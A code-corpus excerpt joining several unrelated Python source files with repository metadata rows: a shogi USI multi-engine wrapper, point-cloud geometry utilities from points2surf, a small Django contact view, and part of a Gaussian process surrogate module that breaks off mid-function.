self.send(f'setoption name {name} value {value}')
def __del__(self):
pass
#self.terminate()
def terminate(self):
self.stop()
self.quit_event.set()
self.send('usi')
self.watcher_thread.join(1)
self.send('quit')
self.status = 'quit'
#self.client.close()
def send(self, command):
logging.debug(f'sending {command} to {self.name}')
print(f'info string sending {command} to {self.name}', flush=True)
self.stdin.write((command + '\n').encode('utf-8'))
self.stdin.flush()
def wait_for(self, command):
logging.debug(f'{self.name}: waiting for {command}')
lines = ""
while self.client.get_transport().is_active():
line = self.queue.get()
lines += f'{line}\n'
if (line == command):
logging.debug(f'{self.name}: found {command}')
self.status = 'wait'
return lines
def wait_for_bestmove(self):
logging.debug(f'{self.name}: waiting for bestmove...')
infostr(f'{self.name}: waiting for bestmove...')
while self.client.get_transport().is_active():
line = self.queue.get()
if (line.startswith('bestmove')):
logging.debug(f'{self.name}: found bestmove')
infostr(f'{self.name}: found bestmove')
bestmove = line[9:].split()[0].strip()
self.status = 'wait'
return bestmove
def set_position(self, pos):
self.position = pos
self.send(f'position {pos}')
def clear_queue(self):
while True:
try:
line = self.queue.get_nowait()
print(f'info string {self.name}: clearing queue: {line}', flush=True)
except queue.Empty:
break
def ponder(self, command):
infostr(f'{self.name}: in ponder()')
self.go_command = command
if 'ponder' not in command:
command = command.replace('go', 'go ponder')
self.send(command)
self.status = 'ponder'
infostr(f'{self.name}: end of ponder()')
def stop(self):
infostr(f'{self.name}: in stop()')
if self.status in ['go', 'ponder']:
self.send('stop')
self.wait_for_bestmove()
self.status = 'wait'
class Chotgun:
def __init__(self, n_jobs=5):
#logging.basicConfig(level=logging.DEBUG)
logging.basicConfig(level=logging.INFO)
engine_path = '/home/hmatsuya/workspace/Shogi/test/yane1/exe/YaneuraOu-by-gcc'
engine_path = '/home/hmatsuya/cobra/exe/YaneuraOu-by-gcc'
self.n_jobs = n_jobs
self.head = None
self.status = 'wait'
self.engines = []
self.position = 'startpos'
self.go_command = None
#for i in range(n_jobs):
#self.engines.append(USIEngine(f'yane{i}', 'localhost', engine_path, multiPV=1))
with open(os.path.join(os.path.dirname(sys.argv[0]), 'hosts.txt')) as f:
i = 0
for host in f:
host = host.strip()
if host:
self.engines.append(USIEngine(f'yane{i}', host, engine_path, multiPV=1))
i += 1
self.n_jobs = i
# setup command watcher thread
logging.debug('setting up command watcher')
self.quit_event = threading.Event()
self.queue = queue.Queue()
self.watcher_thread = threading.Thread(target=self.command_watcher,
name='command_watcher', args=(sys.stdin,))
self.watcher_thread.start()
logging.debug('end of __init__()')
def start(self):
while True:
#if self.status in ['go']:
if self.head is not None:
# print the output of the head engine
#bestmove = self.engines[self.head].bestmove
bestmove = None
while True:
head_engine = self.engines[self.head]
try:
line = head_engine.queue.get_nowait()
if line:
if line.startswith('bestmove'):
bestmove = line.split()[1]
if 'ponder' in line:
ponder = line.split()[3]
print(line, flush=True)
except queue.Empty:
break
if bestmove:
if not 'moves' in self.position:
self.position += ' moves'
self.position += f' {bestmove}'
if bestmove == 'resign':
for e in self.engines:
e.stop()
# check command from stdin
try:
command = self.queue.get_nowait()
print(f'info string command received: {command}', flush=True)
if command.startswith('position'):
print('info string setting position')
self.position = command[len('position'):].strip()
logging.debug(f'position: {self.position}')
print(f'info string position set: {self.position}', flush=True)
elif command.startswith('go'):
logging.debug('go found')
print('info string processing go command', flush=True)
self.go(command)
elif command == 'usi':
logging.debug('usi command')
self.send_all('usi')
output = self.wait_for_all('usiok')
print(output, flush=True)
elif command == 'isready':
logging.debug('isready command')
self.send_all('isready')
self.wait_for_all('readyok')
print('readyok', flush=True)
elif command.split()[0] in ['usinewgame', 'setoption']:
logging.debug(f'{command} command')
print(f'info string sending command: {command}', flush=True)
self.send_all(command)
print(f'info string sent command: {command}', flush=True)
elif command.split()[0] in ['gameover']:
logging.debug(f'{command} command')
print(f'info string sending command: {command}', flush=True)
self.send_all(command)
print(f'info string sent command: {command}', flush=True)
for e in self.engines:
if e.status in ['ponder', 'go']:
e.wait_for_bestmove()
e.status = 'wait'
self.status = 'wait'
elif command == 'ponderhit':
self.ponderhit()
elif command == 'stop':
if self.head is not None:
self.engines[self.head].send('stop')
elif command == 'quit':
self.quit()
else:
logging.debug(f'unrecognized command: {command}')
print(f'info string unrecognized command: {command}')
#else:
except queue.Empty:
logging.debug('no command yet')
time.sleep(0.001)
def command_watcher(self, stream):
logging.debug(f'starting command watcher thread')
#for line in iter(stream.readline, b''):
#while (not self.quit_event.isSet()) and (not stream.closed):
while not self.quit_event.isSet():
line = stream.readline().strip()
logging.debug(f'command queueing: {line}')
if len(line):
self.queue.put(line)
logging.debug(f'terminating the command watcher thread')
def send_all(self, command):
for e in self.engines:
e.send(command)
def wait_for_all(self, command):
for e in self.engines:
output = e.wait_for(command)
return output
def go(self, command):
logging.debug('in go_cmd()')
print('info string in go()', flush=True)
if command.startswith('go ponder'):
#infostr(f'ignoring go ponder: {command}')
self.ponder_cmd(command)
return
self.status = 'go'
self.go_command = command
#self.head = None
#infostr(f'self.head: {self.head}')
# is there any instance pondering the position?
for i, e in enumerate(self.engines):
if e.status in ['go', 'ponder']:
if e.position == self.position:
print(f'info string ponder hit: {e.position}', flush=True)
#e.clear_queue()
if e.status == 'ponder':
e.status = 'go'
e.send('ponderhit')
self.head = i
infostr(f'self.head: {self.head}')
return
# no engine pondering the position
logging.debug('no ponder hit')
print('info string no ponder hit', flush=True)
self.head = 0
infostr(f'self.head: {self.head}')
for i, e in enumerate(self.engines):
#e = self.engines[self.head]
e = self.engines[i]
if e.status in ['go', 'ponder']:
e.send('stop')
e.wait_for_bestmove()
e.set_position(self.position)
e.bestmove = None
if i == self.head:
e.send(command)
e.status = 'go'
break
else:
e.send(command.replace('go', 'go ponder'))
e.status = 'ponder'
infostr('end of go()')
def ponder_cmd(self, command):
logging.debug('in ponder_cmd()')
print('info string in ponder_cmd()', flush=True)
self.status = 'ponder'
# ponder the move sent by GUI
self.head = 0
self.engines[0].stop()
self.engines[0].set_position(self.position)
self.engines[0].ponder(command)
pos, _, head_ponder = self.position.rpartition(' ')
infostr(f'pos: {pos}, _: {_}, head_ponder: {head_ponder}')
# find candidate moves
e = self.engines[1]
e.stop()
e.set_position(pos)
e.set_option('MultiPV', self.n_jobs)
e.pvs = [None] * self.n_jobs
e.send('go')
e.wait_for_bestmove()
e.set_option('MultiPV', 1)
# ponder the moves
max_value = -99999
ie = 1
for i in range(self.n_jobs):
if ie >= self.n_jobs:
break
print(f'i: {i}, ie: {ie}', flush=True)
print(f'head: {self.head}, head\'s status: {self.engines[self.head].status}', flush=True)
print(f'pv{i}: {e.pvs[i]}', flush=True)
logging.debug(f'pv{i}: {e.pvs[i]}')
if not e.pvs[i]:
break
move = e.pvs[i][1].split()[0]
if move == head_ponder:
continue
self.engines[ie].stop()
position = f'{pos} {move}'
self.engines[ie].set_position(position)
self.engines[ie].ponder(command)
ie += 1
print('info string end of ponder_cmd()', flush=True)
def ponderhit(self):
infostr('in ponderhit()')
self.head = 0
e = self.engines[0]
e.status = 'go'
self.status = 'go'
e.send('ponderhit')
def quit(self):
#engine.terminate()
for e in self.engines:
e.terminate()
self.quit_event.set()
self.watcher_thread.join(1)
#return
#sys.exit()
os._exit(1)
def __del__(self):
pass
#self.quit()
def infostr(s):
print(f'info string {s}', flush=True)
def main():
chotgun = Chotgun(n_jobs=5)
chotgun.start()
sys.exit()
if __name__ == "__main__":
main()
sys.exit()
| 35.251748
| 101
| 0.511803
| 14,741
| 0.97474
| 0
| 0
| 0
| 0
| 0
| 0
| 3,661
| 0.242082
|
a2497a32646aebe6dad4bb729f7554cf9a01a99e
| 9,051
|
py
|
Python
|
source/base/utils.py
|
phygitalism/points2surf
|
c8e6d47062fc068802e179a37427981c8e10b128
|
[
"MIT"
] | 4
|
2021-11-25T19:28:16.000Z
|
2022-02-27T19:13:59.000Z
|
source/base/utils.py
|
phygitalism/points2surf
|
c8e6d47062fc068802e179a37427981c8e10b128
|
[
"MIT"
] | null | null | null |
source/base/utils.py
|
phygitalism/points2surf
|
c8e6d47062fc068802e179a37427981c8e10b128
|
[
"MIT"
] | 1
|
2020-09-10T01:05:03.000Z
|
2020-09-10T01:05:03.000Z
|
import numpy as np
import os
from source.base import utils_mp
from source.base import file_utils
def cartesian_dist(vec_x: np.array, vec_y: np.array, axis=1) -> np.ndarray:
dist = np.linalg.norm(vec_x - vec_y, axis=axis)
return dist
def batch_quat_to_rotmat(q, out=None):
"""
quaternion a + bi + cj + dk should be given in the form [a,b,c,d]
:param q:
:param out:
:return:
"""
import torch
batchsize = q.size(0)
if out is None:
out = q.new_empty(batchsize, 3, 3)
# 2 / squared quaternion 2-norm
s = 2 / torch.sum(q.pow(2), 1)
# coefficients of the Hamilton product of the quaternion with itself
h = torch.bmm(q.unsqueeze(2), q.unsqueeze(1))
out[:, 0, 0] = 1 - (h[:, 2, 2] + h[:, 3, 3]).mul(s)
out[:, 0, 1] = (h[:, 1, 2] - h[:, 3, 0]).mul(s)
out[:, 0, 2] = (h[:, 1, 3] + h[:, 2, 0]).mul(s)
out[:, 1, 0] = (h[:, 1, 2] + h[:, 3, 0]).mul(s)
out[:, 1, 1] = 1 - (h[:, 1, 1] + h[:, 3, 3]).mul(s)
out[:, 1, 2] = (h[:, 2, 3] - h[:, 1, 0]).mul(s)
out[:, 2, 0] = (h[:, 1, 3] - h[:, 2, 0]).mul(s)
out[:, 2, 1] = (h[:, 2, 3] + h[:, 1, 0]).mul(s)
out[:, 2, 2] = 1 - (h[:, 1, 1] + h[:, 2, 2]).mul(s)
return out
def is_matrix_symmetric(matrix):
return (matrix != matrix.transpose()).count_nonzero() == 0
def right_handed_to_left_handed(pts: np.ndarray):
pts_res = np.zeros_like(pts)
if pts.shape[0] > 0:
pts_res[:, 0] = pts[:, 0]
pts_res[:, 1] = -pts[:, 2]
pts_res[:, 2] = pts[:, 1]
return pts_res
def get_patch_radii(pts_patch: np.array, query_pts: np.array):
if pts_patch.shape == query_pts.shape:
patch_radius = np.linalg.norm(pts_patch - query_pts, axis=0)
else:
dist = cartesian_dist(np.repeat(np.expand_dims(query_pts, axis=0), pts_patch.shape[0], axis=0),
pts_patch, axis=1)
patch_radius = np.max(dist, axis=0)
return patch_radius
def model_space_to_patch_space_single_point(
pts_to_convert_ms: np.array, pts_patch_center_ms: np.array, patch_radius_ms):
pts_patch_space = pts_to_convert_ms - pts_patch_center_ms
pts_patch_space = pts_patch_space / patch_radius_ms
return pts_patch_space
def model_space_to_patch_space(
pts_to_convert_ms: np.array, pts_patch_center_ms: np.array, patch_radius_ms: float):
pts_patch_center_ms_repeated = \
np.repeat(np.expand_dims(pts_patch_center_ms, axis=0), pts_to_convert_ms.shape[-2], axis=-2)
pts_patch_space = pts_to_convert_ms - pts_patch_center_ms_repeated
pts_patch_space = pts_patch_space / patch_radius_ms
return pts_patch_space
def patch_space_to_model_space_single_point(
pts_to_convert_ps: np.array, pts_patch_center_ms: np.array, patch_radius_ms):
pts_model_space = pts_to_convert_ps * \
np.repeat(np.expand_dims(patch_radius_ms, axis=0), pts_to_convert_ps.shape[0], axis=0)
pts_model_space = pts_model_space + pts_patch_center_ms
return pts_model_space
def patch_space_to_model_space(
pts_to_convert_ps: np.array, pts_patch_center_ms: np.array, patch_radius_ms):
pts_model_space = pts_to_convert_ps * \
np.repeat(np.expand_dims(patch_radius_ms, axis=1), pts_to_convert_ps.shape[1], axis=1)
pts_model_space = pts_model_space + pts_patch_center_ms
return pts_model_space
def _get_pts_normals_single_file(pts_file_in, mesh_file_in,
normals_file_out, pts_normals_file_out,
samples_per_model=10000):
import trimesh.sample
import sys
import scipy.spatial as spatial
from source.base import point_cloud
# sample points on the surface and take face normal
pts = np.load(pts_file_in)
mesh = trimesh.load(mesh_file_in)
samples, face_ids = trimesh.sample.sample_surface(mesh, samples_per_model)
mesh.fix_normals()
# get the normal of the closest sample for each point in the point cloud
# otherwise KDTree construction may run out of recursions
leaf_size = 100
sys.setrecursionlimit(int(max(1000, round(samples.shape[0] / leaf_size))))
kdtree = spatial.cKDTree(samples, leaf_size)
pts_dists, sample_ids = kdtree.query(x=pts, k=1)
face_ids_for_pts = face_ids[sample_ids]
pts_normals = mesh.face_normals[face_ids_for_pts]
np.save(normals_file_out, pts_normals)
point_cloud.write_xyz(pts_normals_file_out, pts, normals=pts_normals)
def get_pts_normals(base_dir, dataset_dir, dir_in_pointcloud,
dir_in_meshes, dir_out_normals, samples_per_model=10000, num_processes=1):
dir_in_pts_abs = os.path.join(base_dir, dataset_dir, dir_in_pointcloud)
dir_in_meshes_abs = os.path.join(base_dir, dataset_dir, dir_in_meshes)
dir_out_normals_abs = os.path.join(base_dir, dataset_dir, dir_out_normals)
dir_out_pts_normals_abs = os.path.join(base_dir, dataset_dir, dir_out_normals, 'pts')
os.makedirs(dir_out_normals_abs, exist_ok=True)
os.makedirs(dir_out_pts_normals_abs, exist_ok=True)
pts_files = [f for f in os.listdir(dir_in_pts_abs)
if os.path.isfile(os.path.join(dir_in_pts_abs, f)) and f[-4:] == '.npy']
files_in_pts_abs = [os.path.join(dir_in_pts_abs, f) for f in pts_files]
files_in_meshes_abs = [os.path.join(dir_in_meshes_abs, f[:-8] + '.ply') for f in pts_files]
files_out_normals_abs = [os.path.join(dir_out_normals_abs, f) for f in pts_files]
files_out_pts_normals_abs = [os.path.join(dir_out_pts_normals_abs, f[:-8] + '.xyz') for f in pts_files]
calls = []
for fi, f in enumerate(pts_files):
# skip if result already exists and is newer than the input
if file_utils.call_necessary([files_in_pts_abs[fi], files_in_meshes_abs[fi]],
[files_out_normals_abs[fi], files_out_pts_normals_abs[fi]]):
calls.append((files_in_pts_abs[fi], files_in_meshes_abs[fi],
files_out_normals_abs[fi], files_out_pts_normals_abs[fi],
samples_per_model))
utils_mp.start_process_pool(_get_pts_normals_single_file, calls, num_processes)
def _get_dist_from_patch_planes_single_file(file_in_pts_abs, file_in_normals_abs,
file_in_pids_abs, file_in_query_abs,
file_out_dists_abs, num_query_points_per_patch):
from trimesh.points import point_plane_distance
pts = np.load(file_in_pts_abs)
normals = np.load(file_in_normals_abs)
pids = np.load(file_in_pids_abs)
query = np.load(file_in_query_abs)
patch_pts = pts[pids]
patch_normals = normals[pids]
patch_center_normal = patch_normals[:, 0]
patch_centers = np.mean(patch_pts, axis=1)
dists = np.zeros(query.shape[0])
for pi in range(pids.shape[0]):
query_points_id_start = pi * num_query_points_per_patch
query_points_id_end = (pi + 1) * num_query_points_per_patch
patch_dists = point_plane_distance(
points=query[query_points_id_start:query_points_id_end],
plane_normal=patch_center_normal[pi],
plane_origin=patch_centers[pi])
patch_dists[np.isnan(patch_dists)] = 0.0
dists[query_points_id_start:query_points_id_end] = patch_dists
np.save(file_out_dists_abs, dists)
def get_point_cloud_sub_sample(sub_sample_size, pts_ms, query_point_ms, uniform=False):
# take random subsample from point cloud
if pts_ms.shape[0] >= sub_sample_size:
# np.random.seed(42) # test if the random subset causes the irregularities
def dist_prob(): # probability decreasing with distance from query point
query_pts = np.broadcast_to(query_point_ms, pts_ms.shape)
dist = cartesian_dist(query_pts, pts_ms)
dist_normalized = dist / np.max(dist)
prob = 1.0 - 1.5 * dist_normalized # linear falloff
# prob = 1.0 - 2.0 * np.sin(dist_normalized * np.pi / 2.0) # faster falloff
prob_clipped = np.clip(prob, 0.05, 1.0) # ensure that the probability is (eps..1.0)
prob_normalized = prob_clipped / np.sum(prob_clipped)
return prob_normalized
if uniform:
# basically choice
# with replacement for better performance, shouldn't hurt with large point clouds
sub_sample_ids = np.random.randint(low=0, high=pts_ms.shape[0], size=sub_sample_size)
else:
prob = dist_prob()
sub_sample_ids = np.random.choice(pts_ms.shape[0], size=sub_sample_size, replace=False, p=prob)
pts_sub_sample_ms = pts_ms[sub_sample_ids, :]
# if not enough take shuffled point cloud and fill with zeros
else:
pts_shuffled = pts_ms[:, :3]
np.random.shuffle(pts_shuffled)
zeros_padding = np.zeros((sub_sample_size - pts_ms.shape[0], 3), dtype=np.float32)
pts_sub_sample_ms = np.concatenate((pts_shuffled, zeros_padding), axis=0)
return pts_sub_sample_ms
| 40.226667
| 108
| 0.667772
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 950
| 0.104961
|
a24a44290243b8973c58ac83bd9c32d62a1b7331
| 194
|
py
|
Python
|
contact/views.py
|
rsHalford/xhalford-django
|
970875bbcd23782af15f24361ec3bbda0230ee81
|
[
"MIT"
] | 2
|
2020-11-02T22:04:01.000Z
|
2020-11-14T14:45:45.000Z
|
contact/views.py
|
rsHalford/xhalford-django
|
970875bbcd23782af15f24361ec3bbda0230ee81
|
[
"MIT"
] | null | null | null |
contact/views.py
|
rsHalford/xhalford-django
|
970875bbcd23782af15f24361ec3bbda0230ee81
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.views.generic import ListView
from contact.models import Profile
class Contact(ListView):
model = Profile
template_name = "contact.html"
| 24.25
| 41
| 0.78866
| 79
| 0.407216
| 0
| 0
| 0
| 0
| 0
| 0
| 14
| 0.072165
|
a24b77db8e7a819628a9ae74f4884a124de6d7df
| 24,382
|
py
|
Python
|
xbbo/surrogate/gaussian_process.py
|
zhanglei1172/bbobenchmark
|
841bffdddc1320ac2676e378d20f8b176a7e6cf7
|
[
"MIT"
] | 2
|
2021-09-06T02:06:22.000Z
|
2021-12-09T10:46:56.000Z
|
xbbo/surrogate/gaussian_process.py
|
zhanglei1172/bbobenchmark
|
841bffdddc1320ac2676e378d20f8b176a7e6cf7
|
[
"MIT"
] | null | null | null |
xbbo/surrogate/gaussian_process.py
|
zhanglei1172/bbobenchmark
|
841bffdddc1320ac2676e378d20f8b176a7e6cf7
|
[
"MIT"
] | null | null | null |
from typing import List
import typing
from scipy import optimize
import sklearn
# from sklearn.gaussian_process import kernels
from sklearn.gaussian_process.kernels import Kernel, KernelOperator
# import torch
# from scipy.linalg import solve_triangular, cholesky
# from scipy import optimize, stats
import numpy as np
# import GPy
from sklearn import gaussian_process
# from botorch.acquisition import ExpectedImprovement
from xbbo.surrogate.base import Surrogate, BaseGP
from xbbo.surrogate.gp_kernels import HammingKernel, Matern, ConstantKernel, WhiteKernel
from xbbo.surrogate.gp_prior import HorseshoePrior, LognormalPrior, Prior, SoftTopHatPrior, TophatPrior
from xbbo.utils.util import get_types
VERY_SMALL_NUMBER = 1e-10
class GaussianTransform:
"""
Transform data into Gaussian by applying psi = Phi^{-1} o F where F is the truncated ECDF.
:param y: shape (n, dim)
"""
def __init__(self, y: np.array):
assert y.ndim == 2
self.dim = y.shape[1]
self.sorted = y.copy()
self.sorted.sort(axis=0)
@staticmethod
def z_transform(series, values_sorted=None):
# applies truncated ECDF then inverse Gaussian CDF.
if values_sorted is None:
values_sorted = sorted(series)
def winsorized_delta(n):
return 1.0 / (4.0 * n**0.25 * np.sqrt(np.pi * np.log(n)))
delta = winsorized_delta(len(series))
def quantile(values_sorted, values_to_insert, delta):
res = np.searchsorted(values_sorted,
values_to_insert) / len(values_sorted)
return np.clip(res, a_min=delta, a_max=1 - delta)
quantiles = quantile(values_sorted, series, delta)
quantiles = np.clip(quantiles, a_min=delta, a_max=1 - delta)
return stats.norm.ppf(quantiles)
def transform(self, y: np.array):
"""
:param y: shape (n, dim)
:return: shape (n, dim), distributed along a normal
"""
assert y.shape[1] == self.dim
# compute truncated quantile, apply gaussian inv cdf
return np.stack([
self.z_transform(y[:, i], self.sorted[:, i])
for i in range(self.dim)
]).T
class StandardTransform:
def __init__(self, y: np.array):
assert y.ndim == 2
self.dim = y.shape[1]
self.mean = y.mean(axis=0, keepdims=True)
self.std = y.std(axis=0, keepdims=True)
def transform(self, y: np.array):
z = (y - self.mean) / np.clip(self.std, a_min=0.001, a_max=None)
return z
class SEkernel():
def __init__(self):
self.initialize()
def initialize(self):
# self.sumF = 0.001
# self.sumL = 0.001
# self.sumY = 0.001
self.sigma_f = 1
self.sigma_l = 1 # TODO 之前设的是1
self.sigma_y = 0.001
def compute_kernel(self, x1, x2=None):
if x2 is None:
x2 = x1
x2 = np.atleast_2d(x2)
x1 = np.atleast_2d(x1)
# noise = np.diag([self.sigma_y**2 for _ in range(x1.shape[0])])
noise = np.eye(x1.shape[0]) * self.sigma_y**2
else:
x2 = np.atleast_2d(x2)
x1 = np.atleast_2d(x1)
noise = 0
dist_matrix = np.sum(x1**2, 1).reshape(-1, 1) + np.sum(
x2**2, 1) - 2 * (x1 @ x2.T)
return self.sigma_f**2 * np.exp(
-0.5 / self.sigma_l**2 * dist_matrix) + noise
class GaussianProcessRegressorARD_gpy(Surrogate):
def __init__(self, dim, min_sample=3):
super(GaussianProcessRegressorARD_gpy, self).__init__(dim, min_sample)
self.cached = {}
self.cached_mu_sigma = {}
self.cached_mu_cov = {}
self.kernel = GPy.kern.Matern52(input_dim=dim, ARD=True)
# self.kernel = GPy.kern.RBF(input_dim=self.dim,
# variance=0.001,
# lengthscale=0.5,
# ARD=True)
self.is_fited = False
self.standardlize = False
def fit(self, x, y):
x = np.atleast_2d(x)
if x.shape[0] < self.min_sample:
return
self.is_fited = True
y = np.asarray(y)
if self.standardlize:
self.Y_mean = y.mean()
self.Y_std = y.std()
else:
self.Y_mean = 0
self.Y_std = 1
y = (y - self.Y_mean) / self.Y_std
self.gpr = GPy.models.gp_regression.GPRegression(x, y, self.kernel)
self.gpr.optimize(max_iters=100)
# self.kernel = self.gpr.kern
def predict(self, newX):
assert self.is_fited
return np.squeeze(self.gpr.predict(
np.atleast_2d(newX))[0]) * self.Y_std + self.Y_mean
def cached_predict(self, newX):
key = hash(newX.data.tobytes())
if key in self.cached_mu_sigma:
return self.cached_mu_sigma[key][0]
if key not in self.cached:
self.cached[key] = self.predict(newX)
return self.cached[key]
def predict_with_sigma(self, newX):
assert self.is_fited
if not self.is_fited:
return 0, np.inf
else:
mu, std = self.gpr.predict(np.atleast_2d(newX), full_cov=True)
return np.squeeze(mu) * self.Y_std + self.Y_mean, np.squeeze(
np.sqrt(std)) * self.Y_std
def cached_predict_with_sigma(self, newX):
key = hash(newX.data.tobytes())
if key not in self.cached_mu_sigma:
self.cached_mu_sigma[key] = self.predict_with_sigma(newX)
return self.cached_mu_sigma[key]
def predict_with_cov(self, newX):
assert self.is_fited
if not self.is_fited:
return 0, np.inf
else:
mu, cov = self.gpr.predict(np.atleast_2d(newX), full_cov=True)
return np.squeeze(mu) * self.Y_std + self.Y_mean, np.squeeze(
cov) * self.Y_std**2
def cached_predict_with_cov(self, newX):
key = hash(newX.data.tobytes())
if key not in self.cached_mu_sigma:
self.cached_mu_cov[key] = self.predict_with_cov(newX)
return self.cached_mu_cov[key]
class GPR_sklearn(BaseGP):
def __init__(
self,
cs,
# min_sample=3,
# alpha=0,
rng=np.random.RandomState(0),
n_opt_restarts: int = 10,
instance_features: typing.Optional[np.ndarray] = None,
pca_components: typing.Optional[int] = None,
**kwargs
):
types, bounds = get_types(cs)
# self.cached = {}
super(GPR_sklearn, self).__init__(cs, types, bounds, rng,instance_features=instance_features,
pca_components=pca_components,**kwargs)
self.is_fited = False
# self.alpha = alpha # Fix RBF kernel error
self.n_opt_restarts = n_opt_restarts
self._n_ll_evals = 0
self._set_has_conditions()
def _get_kernel(self, ):
cov_amp = ConstantKernel(
2.0,
constant_value_bounds=(np.exp(-10), np.exp(2)),
prior=LognormalPrior(mean=0.0, sigma=1.0, rng=self.rng),
)
cont_dims = np.where(np.array(self.types) == 0)[0]
cat_dims = np.where(np.array(self.types) != 0)[0]
if len(cont_dims) > 0:
exp_kernel = Matern(
np.ones([len(cont_dims)]),
[(np.exp(-6.754111155189306), np.exp(0.0858637988771976))
for _ in range(len(cont_dims))],
nu=2.5,
operate_on=cont_dims,
)
if len(cat_dims) > 0:
ham_kernel = HammingKernel(
np.ones([len(cat_dims)]),
[(np.exp(-6.754111155189306), np.exp(0.0858637988771976))
for _ in range(len(cat_dims))],
operate_on=cat_dims,
)
# assert (len(cont_dims) + len(cat_dims)) == len(
# scenario.cs.get_hyperparameters())
noise_kernel = WhiteKernel(
noise_level=1e-8,
noise_level_bounds=(np.exp(-25), np.exp(2)),
prior=HorseshoePrior(scale=0.1, rng=self.rng),
)
if len(cont_dims) > 0 and len(cat_dims) > 0:
# both
kernel = cov_amp * (exp_kernel * ham_kernel) + noise_kernel
elif len(cont_dims) > 0 and len(cat_dims) == 0:
# only cont
kernel = cov_amp * exp_kernel + noise_kernel
elif len(cont_dims) == 0 and len(cat_dims) > 0:
# only cont
kernel = cov_amp * ham_kernel + noise_kernel
else:
raise ValueError()
# kernel = gaussian_process.kernels.ConstantKernel(
# constant_value=1 #, constant_value_bounds=(1e-4, 1e4)
# ) * gaussian_process.kernels.RBF(
# length_scale=1 #, length_scale_bounds=(1e-4, 1e4)
# )
return kernel
def _predict(self,
X_test,
cov_return_type: typing.Optional[str] = 'diagonal_cov'):
'''
return: \mu ,\sigma^2
'''
assert self.is_fited
X_test = self._impute_inactive(X_test)
if cov_return_type is None:
mu = self.gp.predict(X_test)
var = None
if self.normalize_y:
mu = self._untransform_y(mu)
else:
predict_kwargs = {'return_cov': False, 'return_std': True}
if cov_return_type == 'full_cov':
predict_kwargs = {'return_cov': True, 'return_std': False}
mu, var = self.gp.predict(X_test, **predict_kwargs)
if cov_return_type != 'full_cov':
var = var**2 # since we get standard deviation for faster computation
# Clip negative variances and set them to the smallest
# positive float value
var = np.clip(var, VERY_SMALL_NUMBER, np.inf)
if self.normalize_y:
mu, var = self._untransform_y(mu, var)
if cov_return_type == 'diagonal_std':
var = np.sqrt(
var) # converting variance to std deviation if specified
return mu, var
def _get_gp(self) -> gaussian_process.GaussianProcessRegressor:
return gaussian_process.GaussianProcessRegressor(
kernel=self.kernel,
normalize_y=False,
optimizer=None,
n_restarts_optimizer=
-1, # Do not use scikit-learn's optimization routine
alpha=0, # Governed by the kernel
random_state=self.rng,
)
def _nll(self, theta: np.ndarray) -> typing.Tuple[float, np.ndarray]:
"""
Returns the negative marginal log likelihood (+ the prior) for
a hyperparameter configuration theta.
(negative because we use scipy minimize for optimization)
Parameters
----------
theta : np.ndarray(H)
Hyperparameter vector. Note that all hyperparameter are
on a log scale.
Returns
----------
float
lnlikelihood + prior
"""
self._n_ll_evals += 1
try:
lml, grad = self.gp.log_marginal_likelihood(theta, eval_gradient=True)
except np.linalg.LinAlgError:
return 1e25, np.zeros(theta.shape)
for dim, priors in enumerate(self._all_priors):
for prior in priors:
lml += prior.lnprob(theta[dim])
grad[dim] += prior.gradient(theta[dim])
# We add a minus here because scipy is minimizing
if not np.isfinite(lml).all() or not np.all(np.isfinite(grad)):
return 1e25, np.zeros(theta.shape)
else:
return -lml, -grad
def _train(self, X: np.ndarray, y: np.ndarray, **kwargs):
X = np.atleast_2d(X)
X = self._impute_inactive(X)
if self.normalize_y:
y = self._normalize_y(y)
if len(y.shape) == 1:
self.n_objectives_ = 1
else:
self.n_objectives_ = y.shape[1]
if self.n_objectives_ == 1:
y = y.flatten()
n_tries = 10
for i in range(n_tries):
try:
self.gp = self._get_gp() # new model
self.gp.fit(X, y)
break
except np.linalg.LinAlgError as e:
if i == n_tries:
raise e
# Assume that the last entry of theta is the noise
theta = np.exp(self.kernel.theta)
theta[-1] += 1
self.kernel.theta = np.log(theta)
if self.do_optimize:
self._all_priors = self._get_all_priors(add_bound_priors=False)
self.hypers = self._optimize()
self.gp.kernel.theta = self.hypers
self.gp.fit(X, y)
else:
self.hypers = self.gp.kernel.theta
self.is_fited = True
def _get_all_priors(
self,
add_bound_priors: bool = True,
add_soft_bounds: bool = False,
) -> List[List[Prior]]:
# Obtain a list of all priors for each tunable hyperparameter of the kernel
all_priors = []
to_visit = []
to_visit.append(self.gp.kernel.k1)
to_visit.append(self.gp.kernel.k2)
while len(to_visit) > 0:
current_param = to_visit.pop(0)
if isinstance(current_param, KernelOperator):
to_visit.insert(0, current_param.k1)
to_visit.insert(1, current_param.k2)
continue
elif isinstance(current_param, Kernel):
hps = current_param.hyperparameters
assert len(hps) == 1
hp = hps[0]
if hp.fixed:
continue
bounds = hps[0].bounds
for i in range(hps[0].n_elements):
priors_for_hp = []
if current_param.prior is not None:
priors_for_hp.append(current_param.prior)
if add_bound_priors:
if add_soft_bounds:
priors_for_hp.append(
SoftTopHatPrior(
lower_bound=bounds[i][0],
upper_bound=bounds[i][1],
rng=self.rng,
exponent=2,
))
else:
priors_for_hp.append(
TophatPrior(
lower_bound=bounds[i][0],
upper_bound=bounds[i][1],
rng=self.rng,
))
all_priors.append(priors_for_hp)
return all_priors
def _optimize(self) -> np.ndarray:
"""
Optimizes the marginal log likelihood and returns the best found
hyperparameter configuration theta.
Returns
-------
theta : np.ndarray(H)
Hyperparameter vector that maximizes the marginal log likelihood
"""
log_bounds = [(b[0], b[1]) for b in self.gp.kernel.bounds]
# Start optimization from the previous hyperparameter configuration
p0 = [self.gp.kernel.theta]
if self.n_opt_restarts > 0:
dim_samples = []
prior = None # type: typing.Optional[typing.Union[typing.List[Prior], Prior]]
for dim, hp_bound in enumerate(log_bounds):
prior = self._all_priors[dim]
# Always sample from the first prior
if isinstance(prior, list):
if len(prior) == 0:
prior = None
else:
prior = prior[0]
prior = typing.cast(typing.Optional[Prior], prior)
if prior is None:
try:
sample = self.rng.uniform(
low=hp_bound[0],
high=hp_bound[1],
size=(self.n_opt_restarts, ),
)
except OverflowError:
raise ValueError(
'OverflowError while sampling from (%f, %f)' %
(hp_bound[0], hp_bound[1]))
dim_samples.append(sample.flatten())
else:
dim_samples.append(
prior.sample_from_prior(self.n_opt_restarts).flatten())
p0 += list(np.vstack(dim_samples).transpose())
theta_star = None
f_opt_star = np.inf
for i, start_point in enumerate(p0):
theta, f_opt, _ = optimize.fmin_l_bfgs_b(self._nll,
start_point,
